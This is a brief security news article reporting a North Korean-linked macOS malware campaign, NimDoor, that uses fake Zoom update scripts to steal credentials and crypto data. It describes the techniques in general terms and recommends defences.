Fake Zoom Updates Used In Crypto Hack Campaign

A North Korean hacking group is behind a new way of cyberattacks on Web3 and cryptocurrency companies, using a rare type of macOS malware.

Researchers at Sentinel Labs have identified this malware family as NimDoor because it utilizes the obscure programming language Nim.

The attack starts with a social engineering trick. The attackers reach their targets through Telegram by impersonating colleagues. They then ask the victims to execute a “Zoom SDK update script” after sending them a fake Zoom meeting link. The malicious script, which contains 10,000 blank lines and a single typo (“Zook” instead of “Zoom”), downloads

Once triggered, the malware downloads and installs several harmful programs, including one that can steal login credentials, browser data, and Telegram chat history. Another script secretly copies users’ system files, Keychain data, and even terminal history, sending it all back to a remote server.

Unlike most macOS malware, NimDoor uses advanced methods like process injection alongside encrypted WebSocket Secure (wss) communication. The malware becomes increasingly difficult to detect because of its advanced features, which enable secure communication with command servers.

A standout feature is its persistence mechanism: even if a user or system tries to stop the malware, it re-installs itself using macOS’s own signal handling tools (SIGINT/SIGTERM).

“Threat actors are continuing to explore cross-platform languages that introduce new levels of complexity for analysts,” wrote Sentinel Labs researchers Phil Stokes and Raffaele Sabato. They warn that attackers’ use of Nim and AppleScript, along with fake update lures, shows a new level of sophistication.

Security experts recommend that Web3 and crypto platforms need to enhance their security measures while teaching staff about social engineering techniques, given that this malware campaign demonstrates how attackers can use trust exploitation to penetrate secure systems.